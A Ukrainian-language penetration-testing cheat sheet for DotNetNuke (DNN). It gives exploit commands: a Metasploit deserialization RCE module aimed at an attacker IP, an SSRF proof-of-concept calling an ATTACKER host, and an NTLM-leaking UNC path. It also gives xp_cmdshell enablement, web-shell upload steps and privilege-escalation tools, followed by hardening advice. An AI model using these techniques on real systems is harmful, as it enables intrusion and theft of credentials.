DotNetNuke (DNN)

DotNetNuke (DNN)

Якщо ви входите як адміністратор в DNN, легко отримати RCE, однак за останні кілька років було опубліковано ряд неавтентифікованих та пост-автентифікаційних технік. Наступна шпаргалка збирає найбільш корисні примітиви для як наступальних, так і захисних робіт.

Перерахунок версій та середовища

• Перевірте заголовок HTTP-відповіді X-DNN – зазвичай він розкриває точну версію платформи.
• Майстер установки розкриває версію в /Install/Install.aspx?mode=install (доступно на дуже старих установках).
• /API/PersonaBar/GetStatus (9.x) повертає JSON-об'єкт, що містить "dnnVersion" для користувачів з низькими привілеями.
• Типові куки, які ви побачите на живій інстанції:
• .DOTNETNUKE – квиток аутентифікації форм ASP.NET.
• DNNPersonalization – містить XML/серіалізовані дані профілю користувача (старі версії – див. RCE нижче).

Неавтентифіковане використання

1. Десеріалізація куків RCE (CVE-2017-9822 та подальші)

Постраждалі версії ≤ 9.3.0-RC

DNNPersonalization десеріалізується при кожному запиті, коли вбудований обробник 404 увімкнено. Таким чином, підготовлений XML може призвести до довільних ланцюгів гаджетів та виконання коду.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Модуль автоматично обирає правильний шлях для патчених, але все ще вразливих версій (CVE-2018-15811/15812/18325/18326). Експлуатація працює без аутентифікації на 7.x–9.1.x і з перевіреним обліковим записом з низькими привілеями на 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Постраждалі версії < 9.13.8 – Патч випущено в квітні 2025 року

Обхід старого виправлення DnnImageHandler дозволяє зловмиснику примусити сервер виконувати произвольні GET запити (напівсліпий SSRF). Практичні наслідки:

• Внутрішнє сканування портів / виявлення метаданих у хмарних розгортаннях.
• Доступ до хостів, які інакше заблоковані брандмауером від Інтернету.

Доказ концепції (замініть TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

Запит викликається у фоновому режимі; слідкуйте за вашим слухачем для зворотних викликів.

3. Витік NTLM Hash через UNC перенаправлення (CVE-2025-52488)

Постраждалі версії 6.0.0 – 9.x (< 10.0.1)

Спеціально підготовлений контент може змусити DNN спробувати отримати ресурс, використовуючи UNC шлях такий як \\attacker\share\img.png. Windows з радістю виконає NTLM переговори, витікаючи хеші облікових записів сервера до атакуючого. Оновіть до 10.0.1 або вимкніть вихідний SMB на брандмауері.

4. Обхід IP фільтрації (CVE-2025-52487)

Якщо адміністратори покладаються на Host/IP Filters для захисту адміністративного порталу, майте на увазі, що версії до 10.0.1 можуть бути обійдені шляхом маніпуляції X-Forwarded-For у сценарії зворотного проксі.

Пост-аутентифікація до RCE

Через SQL консоль

У Settings → SQL вбудоване вікно запитів дозволяє виконання проти бази даних сайту. На Microsoft SQL Server ви можете увімкнути xp_cmdshell і запускати команди:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Завантаження веб-шелу через ASPX

1. Перейдіть до Налаштування → Безпека → Більше → Додаткові налаштування безпеки.
2. Додайте aspx (або asp) до Дозволені розширення файлів та Зберегти.
3. Перейдіть до /admin/file-management та завантажте shell.aspx.
4. Активуйте його за адресою /Portals/0/shell.aspx.

Підвищення привілеїв на Windows

Якщо виконання коду досягнуто як IIS AppPool<Site>, застосовуються загальні техніки підвищення привілеїв Windows. Якщо система вразлива, ви можете скористатися:

• PrintSpoofer / SpoolFool для зловживання SeImpersonatePrivilege.
• Juicy/Sharp Potatoes для обходу Службових облікових записів.

Рекомендації щодо зміцнення (Блакитна команда)

• Оновіть до принаймні 9.13.9 (виправляє обходи SSRF) або, бажано, 10.0.1 (проблеми з IP-фільтрацією та NTLM).
• Видаліть залишкові InstallWizard.aspx* файли після установки.
• Вимкніть вихідний SMB (порти 445/139).
• Застосуйте суворі Фільтри хостів на крайовому проксі, а не в DNN.
• Заблокуйте доступ до /API/RemoteContentProxy, якщо не використовується.

Посилання

• Документація модуля Metasploit dnn_cookie_deserialization_rce – практичні деталі неавторизованого RCE (GitHub).
• Повідомлення про безпеку GitHub GHSA-3f7v-qx94-666m – інформація про обходи SSRF 2025 року та патчі.